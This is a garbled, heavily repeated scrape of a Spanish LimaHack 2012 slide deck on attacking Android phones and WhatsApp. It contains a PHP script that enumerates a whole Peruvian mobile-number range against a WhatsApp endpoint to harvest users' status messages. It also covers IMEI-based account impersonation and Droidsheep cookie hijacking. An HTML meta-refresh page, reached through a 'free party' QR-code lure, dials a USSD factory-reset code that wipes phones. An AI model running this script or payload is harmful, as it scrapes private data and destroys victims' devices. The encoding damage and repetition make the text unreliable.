Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 15: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/15.jpg)
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 16: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/16.jpg)
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 17: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/17.jpg)
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 18: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/18.jpg)
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
